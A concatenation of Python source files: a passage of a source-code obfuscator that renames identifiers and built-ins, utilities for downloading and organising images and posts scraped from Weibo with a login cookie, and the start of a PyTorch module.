elif result in obfuscatables:
pass
else:
obfuscatables.append(result)
else: # If result is empty we need to reset skip_next so we don't
skip_next = False # accidentally skip the next identifier
return obfuscatables
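# Minimal usage sketch for find_obfuscatables(), assuming
# token_utils.listified_tokenizer() accepts a source string the same way
# apply_obfuscation() uses it above; the variable names in sample_source are
# hypothetical.
def _example_find_variables():
    sample_source = (
        "first_thing = 10\n"
        "second_thing = first_thing * 2\n"
    )
    toks = token_utils.listified_tokenizer(sample_source)
    return find_obfuscatables(toks, obfuscatable_variable)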
# Note: I'm using 'tok' instead of 'token' since 'token' is a built-in module
def obfuscatable_variable(tokens, index, ignore_length=False):
"""
Given a list of *tokens* and an *index* (representing the current position),
returns the token string if it is a variable name that can be safely
obfuscated.
Returns '__skipline__' if the rest of the tokens on this line should be skipped.
Returns '__skipnext__' if the next token should be skipped.
If *ignore_length* is ``True``, even variables that are already a single
character will be obfuscated (typically only used with the ``--nonlatin``
option).
"""
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
line = tok[4]
if index > 0:
prev_tok = tokens[index - 1]
else: # Pretend it's a newline (for simplicity)
prev_tok = (54, '\n', (1, 1), (1, 2), '#\n')
prev_tok_type = prev_tok[0]
prev_tok_string = prev_tok[1]
try:
next_tok = tokens[index + 1]
except IndexError: # Pretend it's a newline
next_tok = (54, '\n', (1, 1), (1, 2), '#\n')
next_tok_string = next_tok[1]
if token_string == "=":
return '__skipline__'
if token_type != tokenize.NAME:
return None # Skip this token
if token_string.startswith('__'):
return None
if next_tok_string == ".":
if token_string in imported_modules:
return None
if prev_tok_string == 'import':
return '__skipline__'
if prev_tok_string == ".":
return '__skipnext__'
if prev_tok_string == "for":
if len(token_string) > 2:
return token_string
if token_string == "for":
return None
if token_string in keyword_args.keys():
return None
if token_string in ["def", "class", 'if', 'elif', 'import']:
return '__skipline__'
if prev_tok_type != tokenize.INDENT and next_tok_string != '=':
return '__skipline__'
if not ignore_length:
if len(token_string) < 3:
return None
if token_string in RESERVED_WORDS:
return None
return token_string
def obfuscatable_class(tokens, index, **kwargs):
"""
Given a list of *tokens* and an *index* (representing the current position),
returns the token string if it is a class name that can be safely
obfuscated.
"""
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
if index > 0:
prev_tok = tokens[index - 1]
else: # Pretend it's a newline (for simplicity)
prev_tok = (54, '\n', (1, 1), (1, 2), '#\n')
prev_tok_string = prev_tok[1]
if token_type != tokenize.NAME:
return None # Skip this token
if token_string.startswith('__'): # Don't mess with specials
return None
if prev_tok_string == "class":
return token_string
def obfuscatable_function(tokens, index, **kwargs):
"""
Given a list of *tokens* and an *index* (representing the current position),
returns the token string if it is a function or method name that can be
safely obfuscated.
"""
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
if index > 0:
prev_tok = tokens[index - 1]
else: # Pretend it's a newline (for simplicity)
prev_tok = (54, '\n', (1, 1), (1, 2), '#\n')
prev_tok_string = prev_tok[1]
if token_type != tokenize.NAME:
return None # Skip this token
if token_string.startswith('__'): # Don't mess with specials
return None
if prev_tok_string == "def":
return token_string
def replace_obfuscatables(module, tokens, obfunc, replace, name_generator, table=None):
"""
Iterates over *tokens*, which must be an equivalent output to what
tokenize.generate_tokens() produces, replacing the given identifier name
(*replace*) by calling *obfunc* on each token with the following parameters:
- **module:** The name of the script we're currently obfuscating.
- **tokens:** The current list of all tokens.
- **index:** The current position.
- **replace:** The token string that we're replacing.
- **replacement:** A randomly generated, unique value that will be used to replace, *replace*.
- **right_of_equal:** A True or False value representing whether or not the token is to the right of an equal sign. **Note:** This gets reset to False if a comma or open paren are encountered.
- **inside_parens:** An integer that is incremented whenever an open paren is encountered and decremented when a close paren is encountered.
- **inside_function:** If not False, the name of the function definition we're inside of (used in conjunction with *keyword_args* to determine if a safe replacement can be made).
*obfunc* is expected to return the token string if that token can be safely
obfuscated **or** one of the following optional values which will instruct
find_obfuscatables() how to proceed:
- **'__open_paren__'** Increment the inside_parens value
- **'__close_paren__'** Decrement the inside_parens value
- **'__comma__'** Reset the right_of_equal value to False
- **'__right_of_equal__'** Sets the right_of_equal value to True
**Note:** The right_of_equal and the inside_parens values are reset whenever a NEWLINE is encountered.
When obfuscating a list of files, *table* is used to keep track of which
obfuscatable identifiers are which inside each resulting file. It must be
an empty dictionary that will be populated like so::
{orig_name: obfuscated_name}
This *table* of "what is what" will be used to ensure that references from
one script/module that call another are kept in sync when they are replaced
with obfuscated values.
"""
# Pretend the first line is '#\n':
skip_line = False
skip_next = False
right_of_equal = False
inside_parens = 0
inside_function = False
indent = 0
function_indent = 0
replacement = next(name_generator)
for index, tok in enumerate(tokens):
token_type = tok[0]
token_string = tok[1]
if token_type == tokenize.NEWLINE:
skip_line = False
right_of_equal = False
inside_parens = 0
elif token_type == tokenize.INDENT:
indent += 1
elif token_type == tokenize.DEDENT:
indent -= 1
if inside_function and function_indent == indent:
function_indent = 0
inside_function = False
if token_string == "def":
function_indent = indent
function_name = tokens[index + 1][1]
inside_function = function_name
result = obfunc(
tokens,
index,
replace,
replacement,
right_of_equal,
inside_parens,
inside_function
)
if result:
if skip_next:
skip_next = False
elif skip_line:
pass
elif result == '__skipline__':
skip_line = True
elif result == '__skipnext__':
skip_next = True
elif result == '__open_paren__':
right_of_equal = False
inside_parens += 1
elif result == '__close_paren__':
inside_parens -= 1
elif result == '__comma__':
right_of_equal = False
elif result == '__right_of_equal__':
# We only care if we're right of the equal sign outside of
# parens (which indicates arguments)
if not inside_parens:
right_of_equal = True
else:
if table: # Save it for later use in other files
combined_name = "%s.%s" % (module, token_string)
try: # Attempt to use an existing value
tokens[index][1] = table[0][combined_name]
except KeyError: # Doesn't exist, add it to table
table[0].update({combined_name: result})
tokens[index][1] = result
else:
tokens[index][1] = result
def obfuscate_variable(
tokens,
index,
replace,
replacement,
right_of_equal,
inside_parens,
inside_function):
"""
If the token string inside *tokens[index]* matches *replace*, return
*replacement*. *right_of_equal*, and *inside_parens* are used to determine
whether or not this token is safe to obfuscate.
"""
def return_replacement(replacement):
VAR_REPLACEMENTS[replacement] = replace
return replacement
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
if index > 0:
prev_tok = tokens[index - 1]
else: # Pretend it's a newline (for simplicity)
prev_tok = (54, '\n', (1, 1), (1, 2), '#\n')
prev_tok_string = prev_tok[1]
try:
next_tok = tokens[index + 1]
except IndexError: # Pretend it's a newline
next_tok = (54, '\n', (1, 1), (1, 2), '#\n')
if token_string == "import":
return '__skipline__'
if next_tok[1] == '.':
if token_string in imported_modules:
return None
if token_string == "=":
return '__right_of_equal__'
if token_string == "(":
return '__open_paren__'
if token_string == ")":
return '__close_paren__'
if token_string == ",":
return '__comma__'
if token_type != tokenize.NAME:
return None # Skip this token
if token_string.startswith('__'):
return None
if prev_tok_string == 'def':
return '__skipnext__' # Don't want to touch functions
if token_string == replace and prev_tok_string != '.':
if inside_function:
if token_string not in keyword_args[inside_function]:
if not right_of_equal:
if not inside_parens:
return return_replacement(replacement)
else:
if next_tok[1] != '=':
return return_replacement(replacement)
elif not inside_parens:
return return_replacement(replacement)
else:
if next_tok[1] != '=':
return return_replacement(replacement)
elif not right_of_equal:
if not inside_parens:
return return_replacement(replacement)
else:
if next_tok[1] != '=':
return return_replacement(replacement)
elif right_of_equal and not inside_parens:
return return_replacement(replacement)
def obfuscate_function(tokens, index, replace, replacement, *args):
"""
If the token string (a function) inside *tokens[index]* matches *replace*,
return *replacement*.
"""
def return_replacement(replacement):
FUNC_REPLACEMENTS[replacement] = replace
return replacement
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
prev_tok = tokens[index - 1]
prev_tok_string = prev_tok[1]
if token_type != tokenize.NAME:
return None # Skip this token
if token_string.startswith('__'):
return None
if token_string == replace:
if prev_tok_string != '.':
if token_string == replace:
return return_replacement(replacement)
else:
parent_name = tokens[index - 2][1]
if parent_name in CLASS_REPLACEMENTS:
# This should work for @classmethod methods
return return_replacement(replacement)
elif parent_name in VAR_REPLACEMENTS:
# This covers regular ol' instance methods
return return_replacement(replacement)
def obfuscate_class(tokens, index, replace, replacement, *args):
"""
If the token string (a class) inside *tokens[index]* matches *replace*,
return *replacement*.
"""
def return_replacement(replacement):
CLASS_REPLACEMENTS[replacement] = replace
return replacement
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
prev_tok = tokens[index - 1]
prev_tok_string = prev_tok[1]
if token_type != tokenize.NAME:
return None # Skip this token
if token_string.startswith('__'):
return None
if prev_tok_string != '.':
if token_string == replace:
return return_replacement(replacement)
def obfuscate_unique(tokens, index, replace, replacement, *args):
"""
If the token string (a unique value anywhere) inside *tokens[index]*
matches *replace*, return *replacement*.
.. note::
        This function is only for replacing absolutely unique occurrences of
*replace* (where we don't have to worry about their position).
"""
def return_replacement(replacement):
UNIQUE_REPLACEMENTS[replacement] = replace
return replacement
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
if token_type != tokenize.NAME:
return None # Skip this token
if token_string == replace:
return return_replacement(replacement)
def remap_name(name_generator, names, table=None):
"""
Produces a series of variable assignments in the form of::
<obfuscated name> = <some identifier>
for each item in *names* using *name_generator* to come up with the
replacement names.
If *table* is provided, replacements will be looked up there before
generating a new unique name.
"""
out = ""
for name in names:
if table and name in table[0].keys():
replacement = table[0][name]
else:
replacement = next(name_generator)
out += "%s=%s\n" % (replacement, name)
return out
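# Minimal sketch of remap_name() output, assuming a fresh generator: the result
# is a newline-separated series of "<replacement>=<original>" assignments,
# e.g. something like "a=print\nb=len\n" (actual replacement names vary).
def _example_remap_builtins():
    gen = obfuscation_machine(identifier_length=1)
    return remap_name(gen, ['print', 'len'])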
def insert_in_next_line(tokens, index, string):
"""
    Inserts the given *string* (tokenized) into *tokens* just after the next
    newline token found at or beyond *tokens[index]*.
"""
tokenized_string = token_utils.listified_tokenizer(string)
for i, tok in list(enumerate(tokens[index:])):
token_type = tok[0]
if token_type in [tokenize.NL, tokenize.NEWLINE]:
for count, item in enumerate(tokenized_string):
tokens.insert(index + count + i + 1, item)
break
def obfuscate_builtins(module, tokens, name_generator, table=None):
"""
Inserts an assignment, '<obfuscated identifier> = <builtin function>' at
the beginning of *tokens* (after the shebang and encoding if present) for
every Python built-in function that is used inside *tokens*. Also, replaces
    all of said built-in functions in *tokens* with each respective obfuscated
    identifier.
Obfuscated identifier names are pulled out of name_generator via next().
If *table* is provided, replacements will be looked up there before
generating a new unique name.
"""
used_builtins = analyze.enumerate_builtins(tokens)
obfuscated_assignments = remap_name(name_generator, used_builtins, table)
replacements = []
for assignment in obfuscated_assignments.split('\n'):
replacements.append(assignment.split('=')[0])
replacement_dict = dict(zip(used_builtins, replacements))
if table:
table[0].update(replacement_dict)
iter_replacements = iter(replacements)
for builtin in used_builtins:
replace_obfuscatables(
module, tokens, obfuscate_unique, builtin, iter_replacements)
# Check for shebangs and encodings before we do anything else
skip_tokens = 0
matched_shebang = False
matched_encoding = False
for tok in tokens[0:4]: # Will always be in the first four tokens
line = tok[4]
if analyze.shebang.match(line): # (e.g. '#!/usr/bin/env python')
if not matched_shebang:
matched_shebang = True
skip_tokens += 1
elif analyze.encoding.match(line): # (e.g. '# -*- coding: utf-8 -*-')
if not matched_encoding:
matched_encoding = True
skip_tokens += 1
insert_in_next_line(tokens, skip_tokens, obfuscated_assignments)
def obfuscate_global_import_methods(module, tokens, name_generator, table=None):
"""
Replaces the used methods of globally-imported modules with obfuscated
equivalents. Updates *tokens* in-place.
*module* must be the name of the module we're currently obfuscating
If *table* is provided, replacements for import methods will be attempted
to be looked up there before generating a new unique name.
"""
global_imports = analyze.enumerate_global_imports(tokens)
#print("global_imports: %s" % global_imports)
local_imports = analyze.enumerate_local_modules(tokens, os.getcwd())
#print("local_imports: %s" % local_imports)
module_methods = analyze.enumerate_import_methods(tokens)
#print("module_methods: %s" % module_methods)
# Make a 1-to-1 mapping dict of module_method<->replacement:
if table:
replacement_dict = {}
for module_method in module_methods:
if module_method in table[0].keys():
replacement_dict.update({module_method: table[0][module_method]})
else:
replacement_dict.update({module_method: next(name_generator)})
# Update the global lookup table with the new entries:
table[0].update(replacement_dict)
else:
method_map = [next(name_generator) for i in module_methods]
replacement_dict = dict(zip(module_methods, method_map))
import_line = False
# Replace module methods with our obfuscated names in *tokens*
for module_method in module_methods:
for index, tok in enumerate(tokens):
token_type = tok[0]
token_string = tok[1]
if token_type != tokenize.NAME:
continue # Speedup
if token_string == module_method.split('.')[0]:
if tokens[index + 1][1] == '.':
if tokens[index + 2][1] == module_method.split('.')[1]:
if table: # Attempt to use an existing value
tokens[index][1] = table[0][module_method]
tokens[index + 1][1] = ""
tokens[index + 2][1] = ""
else:
tokens[index][1] = replacement_dict[module_method]
tokens[index + 1][1] = ""
tokens[index + 2][1] = ""
# Insert our map of replacement=what after each respective module import
for module_method, replacement in replacement_dict.items():
indents = []
index = 0
for tok in tokens[:]:
token_type = tok[0]
token_string = tok[1]
if token_type == tokenize.NEWLINE:
import_line = False
elif token_type == tokenize.INDENT:
indents.append(tok)
elif token_type == tokenize.DEDENT:
indents.pop()
elif token_string == "import":
import_line = True
elif import_line:
if token_string == module_method.split('.')[0]:
# Insert the obfuscation assignment after the import
imported_module = ".".join(module_method.split('.')[:-1])
if table and imported_module in local_imports:
line = "%s=%s.%s\n" % ( # This ends up being 6 tokens
replacement_dict[module_method],
imported_module,
replacement_dict[module_method]
)
else:
line = "%s=%s\n" % ( # This ends up being 6 tokens
replacement_dict[module_method], module_method)
for indent in indents: # Fix indentation
line = "%s%s" % (indent[1], line)
index += 1
insert_in_next_line(tokens, index, line)
index += 6 # To make up for the six tokens we inserted
index += 1
def obfuscate(module, tokens, options, name_generator=None, table=None):
"""
Obfuscates *tokens* in-place. *options* is expected to be the options
variable passed through from pyminifier.py.
*module* must be the name of the module we're currently obfuscating
If *name_generator* is provided it will be used to obtain replacement values
    for identifiers. If not, a new instance of obfuscation_machine() will be
    created using the replacement length and character set given in *options*.
If *table* is given (should be a list containing a single dictionary), it
will be used to perform lookups of replacements and any new replacements
will be added to it.
"""
# Need a universal instance of our generator to avoid duplicates
identifier_length = int(options.replacement_length)
ignore_length = False
if not name_generator:
if options.use_nonlatin:
ignore_length = True
if sys.version_info[0] == 3:
name_generator = obfuscation_machine(
use_unicode=True, identifier_length=identifier_length)
else:
                print(
                    "ERROR: You can't use nonlatin characters without Python 3")
                sys.exit(1)
else:
name_generator = obfuscation_machine(
identifier_length=identifier_length)
if options.obfuscate:
variables = find_obfuscatables(
tokens, obfuscatable_variable, ignore_length=ignore_length)
classes = find_obfuscatables(
tokens, obfuscatable_class)
functions = find_obfuscatables(
tokens, obfuscatable_function)
for variable in variables:
replace_obfuscatables(
module,
tokens,
obfuscate_variable,
variable,
name_generator,
table
)
for function in functions:
replace_obfuscatables(
module,
tokens,
obfuscate_function,
function,
name_generator,
table
)
for _class in classes:
replace_obfuscatables(
module, tokens, obfuscate_class, _class, name_generator, table)
obfuscate_global_import_methods(module, tokens, name_generator, table)
obfuscate_builtins(module, tokens, name_generator, table)
else:
if options.obf_classes:
classes = find_obfuscatables(
tokens, obfuscatable_class)
for _class in classes:
replace_obfuscatables(
module,
tokens,
obfuscate_class,
_class,
name_generator,
table
)
if options.obf_functions:
functions = find_obfuscatables(
tokens, obfuscatable_function)
for function in functions:
replace_obfuscatables(
module,
tokens,
obfuscate_function,
function,
name_generator,
table
)
if options.obf_variables:
variables = find_obfuscatables(
tokens, obfuscatable_variable)
for variable in variables:
replace_obfuscatables(
module,
tokens,
obfuscate_variable,
variable,
name_generator,
table
)
if options.obf_import_methods:
obfuscate_global_import_methods(
module, tokens, name_generator, table)
if options.obf_builtins:
obfuscate_builtins(module, tokens, name_generator, table)
if __name__ == "__main__":
global name_generator
try:
source = open(sys.argv[1]).read()
except:
print("Usage: %s <filename.py>" % sys.argv[0])
sys.exit(1)
if sys.version_info[0] == 3:
name_generator = obfuscation_machine(use_unicode=True)
else:
name_generator = obfuscation_machine(identifier_length=1)
source = apply_obfuscation(source)
print(source)
|
the-stack_106_30639 | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
Some useful classes and functions (all paths are absolute paths):
+ stream_tee(object): log output to a file while keeping the console alive
+ get_subdir(): get the list of sub-directories
+ decode_imgurl(url, cookie): resolve a Weibo imgref URL to the real image URL
+ download_image_from_list: download images from a link list, saved under user_id/images/fromlist/
+ repair_image_list(imglist_file): repair unresolved links in an image-link list
"""
import re
import os
import time
import requests
import traceback
import platform
import shutil
from bs4 import BeautifulSoup
from config import cookie
from config import pause_time
from config import line_to_buffer
from datetime import datetime
class stream_tee(object):
# from: http://www.tentech.ca/2011/05/stream-tee-in-python-saving-stdout-to-file-while-keeping-the-console-alive/
# Based on https://gist.github.com/327585 by Anand Kunal
def __init__(self, stream1, stream2):
self.stream1 = stream1
self.stream2 = stream2
self.__missing_method_name = None # Hack!
def __getattribute__(self, name):
return object.__getattribute__(self, name)
def __getattr__(self, name):
self.__missing_method_name = name # Could also be a property
return getattr(self, '__methodmissing__')
def __methodmissing__(self, *args, **kwargs):
# Emit method call to the log copy
callable2 = getattr(self.stream2, self.__missing_method_name)
callable2(*args, **kwargs)
# Emit method call to stdout (stream 1)
callable1 = getattr(self.stream1, self.__missing_method_name)
return callable1(*args, **kwargs)
def get_subdir(current_directory):
dirs = [x[0] for x in os.walk(current_directory)]
    dirs = dirs[1:]  # the first entry is current_directory itself
    # sort / max over numeric directory names, e.g.:
# sorted([int(x.split(os.path.sep)[-1]) for x in dirs])
# max([int(x.split(os.path.sep)[-1]) for x in dirs])
return dirs
def decode_imgurl(imgref,cookie):
connection_timeout = 90
try_num = 1
imgurl = imgref
start_time = time.time()
while imgurl == imgref:
while True:
try:
html = requests.get(imgref,cookies=cookie, timeout=60)
break
except Exception:
                if time.time() > start_time + connection_timeout:
                    raise Exception('Unable to get connection %s after %s seconds of ConnectionErrors' \
                                    % (imgref, connection_timeout))
else:
time.sleep(1)
if html.url == imgref:
soup = BeautifulSoup(html.content,"lxml")
try:
imgurl = soup.findAll("a",href=re.compile(r'^http://',re.I))[0]['href']
            except IndexError:  # page fetched too quickly and not fully loaded; retry
print("读取过快")
imgurl = imgref
time.sleep(1)
else:
imgurl = html.url
try_num += 1
if try_num > 10:
print("解析失败.已达到最大尝试数10. 请手动解析")
return ""
print("解析成功: %s" % imgurl)
return imgurl
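# Minimal usage sketch for decode_imgurl(), assuming `cookie` imported from
# config above is a valid logged-in cookie dict; the ref URL below is a
# hypothetical placeholder, not a real image reference.
def example_decode_single_imgref():
    sample_imgref = "http://weibo.cn/mblog/oripic?id=0000000000"  # placeholder
    return decode_imgurl(sample_imgref, cookie)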
def download_image_from_list(filepath,start_position=1):
"""
    Download images from an image-link list.
    Input: path/inputfile (txt, one "weibo_title, imgurl" pair per line)
    Output: path/images/fromlist/
    imgurl is expected to look like http://******/name.<ext>
    start_position: index of the weibo to start from, to avoid re-resolving links
"""
print("从" + filepath + "列表下载图片")
if not os.path.isfile(filepath):
print(filepath + "不存在")
return None
outpath = os.path.sep.join(filepath.split(os.path.sep)[:-1]) + \
os.path.sep + "images" + os.path.sep + "fromlist"
if not os.path.isdir(outpath):
os.makedirs(outpath)
    # assumes the file path follows /weibo/<user_id>/img_list.txt
# user_id = int(filepath.split(os.path.sep)[-2])
subdirs = get_subdir(outpath)
if subdirs:
start_position = max([int(x.split(os.path.sep)[-1]) for x in subdirs])
else:
start_position = start_position
weibo_pic_count = 1
pre_weibo_title = 1
with open(filepath,"r") as f:
for line in f:
weibo_title = line.split(",")[0].strip()
imgurl = line.split(",")[1].strip()
if int(weibo_title) >= start_position:
if len(imgurl.split("/")[-1].split(".")) <= 1:
print("无效图片链接: %s" % imgurl)
if re.search(r'^https://.*',imgurl,re.I):
print("重新解析")
imgurl = decode_imgurl(imgurl,cookie)
if not imgurl:
weibo_pic_count += 1
continue
else:
weibo_pic_count += 1
continue
extension = imgurl[-4:] # .jpg
if pre_weibo_title != weibo_title:
weibo_pic_count = 1 # reset
pre_weibo_title = weibo_title
time.sleep(1)
temp_dir = outpath + os.path.sep + weibo_title
if not os.path.isdir(temp_dir):
os.makedirs(temp_dir)
temp = temp_dir + os.path.sep + str(weibo_pic_count) + extension
weibo_pic_count += 1
not_connected = False
start_time = time.time()
while True:
try:
r = requests.get(imgurl,stream=True)
break
except Exception as e:
if time.time() > start_time + 90:
not_connected = True
raise Exception('Unable to get connection %s (download image) after 60 \
seconds of ConnectionErrors.跳过' % (imgurl))
else:
time.sleep(1)
if not_connected:
continue
elif r.status_code == 200:
if not os.path.isfile(temp):
with open(temp,'wb') as f:
for chunk in r.iter_content(chunk_size=512 * 1024):
f.write(chunk)
print("已下载: %s, %s, %s" % (weibo_title, weibo_pic_count-1,imgurl))
else:
print("文件已存在: %s, %s, %s" % (weibo_title, weibo_pic_count-1,imgurl))
print("全部图片下载完成: " + outpath)
def repair_image_list(filepath):
"""
    Repair unresolved image links in the list.
    Input: path/inputfile (txt, one "weibo_title, imgurl" pair per line)
    Output: path/inputfile-new (renamed back over the original file)
"""
print("列表: " + filepath)
if not os.path.isfile(filepath):
print(filepath + "不存在")
return None
outpath = os.path.sep.join(filepath.split(os.path.sep)[:-1])
filename, ext = filepath.split(os.path.sep)[-1].split('.')
backup_path = outpath + os.path.sep + filename + '-' + datetime.now().strftime('%Y-%m-%d-%H-%M') + '.' + ext
shutil.copy2(filepath, backup_path)
newname = outpath + os.path.sep + filename+ "-new." + ext
    # assumes the file path follows /weibo/<user_id>/img_list.txt
# user_id = int(filepath.split(os.path.sep)[-2])
fo = open(newname,"w")
line_count = 1
with open(filepath,"r") as f:
for line in f:
weibo_title = line.split(",")[0].strip()
imgurl = line.split(",")[1].strip()
if len(imgurl.split("/")[-1].split(".")) <= 1:
print("无效链接: %s, %s" % (weibo_title,imgurl))
newurl = decode_imgurl(imgurl,cookie)
if newurl:
imgurl = newurl
print("重新解析: %s, %s" %(weibo_title, imgurl))
else:
print("%s, %s" % (weibo_title, imgurl))
fo.write(weibo_title + ", " + imgurl + "\n")
line_count +=1
fo.close()
os.rename(newname, filepath)
def reformat_time(time_string):
if len(time_string) >= 16:
year = time_string[:4]
month = time_string[5:7]
day = time_string[8:10]
hour = time_string[11:13]
minute = time_string[14:16]
return year + month + day + hour + minute
else:
return time_string
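# Minimal sketch of reformat_time(): "2016-01-02 13:45" -> "201601021345";
# strings shorter than 16 characters are returned unchanged.
def example_reformat_time():
    return reformat_time("2016-01-02 13:45")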
def read_weibo_file(inputfile):
try:
f = open(inputfile,'rt', encoding='utf-8')
except Exception as e:
print(e)
last_line = ""
    # user profile header
    next(f)  # skip the "user info" header line
username = next(f)[5:].strip()
user_id = int(next(f)[5:])
weibo_num = int(next(f)[4:])
following = int(next(f)[4:])
followers = int(next(f)[4:])
next(f)
next(f)
user = {"username":username,"user_id":user_id,"weibo_num":weibo_num,"following":following,"followers":followers}
content = []
meta = []
publish_time = []
weibo_num = 0
weibo_content = ""
for line in f:
if line != '\n':
if re.search(r'^发布时间.*',line):
publish_time.append(line[5:].strip())
elif re.search(r'^点赞数.*',line):
pattern = r"\d+\.?\d*"
guid = re.findall(pattern,line,re.S | re.M)
up_num = int(guid[0])
retweet_num = int(guid[1])
comment_num = int(guid[2])
meta.append({"up_num":up_num,"retweet_num":retweet_num,"comment_num":comment_num})
else:
weibo_content = weibo_content + line
else:
content.append(':'.join(weibo_content.split(':')[1:]).strip())
weibo_content = ""
weibo_num += 1
            # fill in defaults if any field is missing for this weibo
if len(content) < weibo_num:
content.append("")
if len(meta) < weibo_num:
meta.append({"up_num":0,"retweet_num":0,"comment_num":0})
if len(publish_time) < weibo_num:
publish_time.append("2088-12-12 12:12")
last_line = line
    # complete the last record if the file did not end with a blank line
if last_line != '\n':
weibo_num = weibo_num + 1
if len(content) < weibo_num:
content.append("")
if len(meta) < weibo_num:
meta.append({"up_num":0,"retweet_num":0,"comment_num":0})
if len(publish_time) < weibo_num:
publish_time.append("2088-12-12 12:12")
return {"user":user,"content":content,"publish_time":publish_time,"meta":meta}
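# Minimal sketch of the dict returned by read_weibo_file() (keys as built
# above); the path below is a hypothetical example.
def example_read_profile():
    data = read_weibo_file("weibo" + os.path.sep + "1234567890" + os.path.sep + "1234567890.txt")
    user = data["user"]              # {"username", "user_id", "weibo_num", "following", "followers"}
    first_post = data["content"][0]  # text of the first weibo
    first_time = data["publish_time"][0]
    return user, first_post, first_time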
def decode_imgreflist(inputfile,start_position=1):
if not os.path.isfile(inputfile):
print("文件不存在 %s" % inputfile)
return
    # output file
print("解析imgref列表:" + inputfile.split(os.path.sep)[-1])
outpath = os.path.sep.join(inputfile.split(os.path.sep)[:-1])
file_path = outpath + os.path.sep + "img_list.txt"
if os.path.isfile(file_path):
backup_path = outpath + os.path.sep + "img_list-" + datetime.now().strftime('%Y-%m-%d-%H-%M') + ".txt"
print("备份 %s > %s" % (file_path.split(os.path.sep)[-1], backup_path.split(os.path.sep)[-1]))
os.rename(file_path, backup_path)
fo = open(file_path,"w",line_to_buffer)
img_weibo_count = 0
img_count = 0
with open(inputfile,'r') as f:
for line in f:
if line.strip():
weibo_title, refurl = line.split(',')
if int(weibo_title) >= start_position:
if re.search(r'^http://weibo.cn/mblog/oripic.*', refurl.strip(), re.I):
imgref = refurl.strip()
if imgref:
print("正在解析第%d条微博原图" % int(weibo_title))
newurl = decode_imgurl(imgref,cookie)
if newurl:
print("已解析")
fo.write(weibo_title + ', ' + newurl + '\n')
img_count += 1
img_weibo_count += 1
elif re.search(r'^http://weibo.cn/mblog/picAll.*', refurl.strip(), re.I):
imgsetref = refurl.strip()
if imgsetref:
print("正在解析第%d条微博组图" % int(weibo_title))
try:
html = requests.get(imgsetref,cookies=cookie).content
soup = BeautifulSoup(html,"lxml")
imgurl_set = soup.findAll('a',href=re.compile(r'^/mblog/oripic',re.I))
total_pics = len(imgurl_set)
set_count = 1
for imgrefpack in imgurl_set:
imgref = 'http://weibo.cn' + re.sub(r"amp;", '', imgrefpack['href'])
newurl = decode_imgurl(imgref,cookie)
if newurl:
print("已解析组图第%d条/共%d条" % (set_count, total_pics))
fo.write(weibo_title + ', ' + newurl + '\n')
set_count += 1
img_count += 1
img_weibo_count += 1
time.sleep(pause_time)
except Exception as e:
traceback.print_exc()
print(e)
fo.close()
print("所有链接解析完毕")
print("共%d条配图微博,共%d张图片" % (img_weibo_count,img_count))
print("储存于: " + file_path)
def remove_nbws(text):
""" remove unwanted unicode punctuation: zwsp, nbws, \t, \r, \r.
"""
# ZWSP: Zero width space
text = text.replace(u'\u200B', '')
# NBWS: Non-breaking space
text = text.replace(u'\xa0', ' ')
# HalfWidth fullstop
text = text.replace(u'\uff61', '')
# Bullet
text = text.replace(u'\u2022', '')
# White space
text = text.replace(u'\t', ' ').replace(u'\r', ' ')
# General Punctuation
gpc_pattern = re.compile(r'[\u2000-\u206F]')
text = gpc_pattern.sub('', text)
# Mathematical Operator
mop_pattern = re.compile(r'[\u2200-\u22FF]')
text = mop_pattern.sub('', text)
# Combining Diacritical Marks
dcm_pattern = re.compile(r'[\u0300-\u036F]')
text = dcm_pattern.sub('', text)
# Hangul Syllable
hangul_pattern = re.compile(r'[\uac00-\ud7af]')
text = hangul_pattern.sub('',text)
lsp_pattern = re.compile(r'[\x80-\xFF]')
text = lsp_pattern.sub('', text)
return text
def legitimize(text, myos=platform.system()):
"""Converts a string to a valid filename.
credit: soimort/you-get.
option: filename.
"""
# POSIX systems
text = text.translate({
0: None,
ord('/'): '-',
ord('|'): '-',
ord(':'): '-',
ord('\uFF1A'): ' ',
})
if myos == 'Windows':
# Windows (non-POSIX namespace)
text = text.translate({
# Reserved in Windows VFAT and NTFS
ord(':'): '-',
ord('\uFF1A'): ' ',
ord('*'): '-',
ord('?'): '-',
ord('\\'): '-',
ord('\"'): '\'',
# Reserved in Windows VFAT
ord('+'): '-',
ord('<'): '-',
ord('>'): '-',
ord('['): '(',
ord(']'): ')',
})
else:
# *nix
if myos == 'Darwin':
# Mac OS HFS+
text = text.translate({
ord(':'): '-',
})
# Remove leading .
if text.startswith("."):
text = text[1:]
    text = text[:80]  # Trim to 80 Unicode characters long
return text
def check_backup(working_path, frequency='1'):
""" Check if files exist in working-path and make a copy
option: 1: only make one backup, other: make backup based on time
"""
if os.path.isdir(working_path):
files = [f for f in os.listdir(working_path) if os.path.isfile(working_path + os.path.sep + f)]
if len(files) > 0:
if frequency == '1':
backup_dir = working_path + os.path.sep + "latest_backup"
else:
backup_dir = working_path + os.path.sep + legitimize(datetime.now().strftime('%Y%m%d-%H%M'))
if not os.path.isdir(backup_dir):
os.makedirs(backup_dir)
for i in range(0, len(files)):
shutil.copy2(working_path + os.path.sep + files[i], backup_dir + os.path.sep + files[i])
def create_picText(working_path, user_id):
# work path = "SinaSpider-master\weibo\user_id"
texts = read_weibo_file(working_path + os.path.sep + str(user_id) + '.txt')
#userprofile = texts['user'] # {"username":username,"user_id":user_id,"weibo_num":weibo_num,"following":following,"followers":followers}
weibo_content = texts['content'] # string
publish_time = texts['publish_time']# ["2088-12-12 12:12"]
#meta = texts['meta'] # [{"up_num":up_num,"retweet_num":retweet_num,"comment_num":comment_num}]
picPath = working_path + os.path.sep + 'images' + os.path.sep + 'fromlist'
all_picDirectories = [x[0] for x in os.walk(picPath)][1:]
for _onePic in all_picDirectories:
_index = int(_onePic.split(os.path.sep)[-1])
_text = publish_time[_index-1] + os.linesep + weibo_content[_index-1]
f = open(_onePic + os.path.sep + 'text.txt', "wt", encoding='utf-8')
f.write(_text)
f.close()
print("图片文字录入完毕: %s" % (str(_index) + ": " + publish_time[_index-1]))
|
the-stack_106_30644 | import torch
import torch.nn.functional as F
from torch import nn
import torch.distributed as dist
import numpy as np
@torch.no_grad()
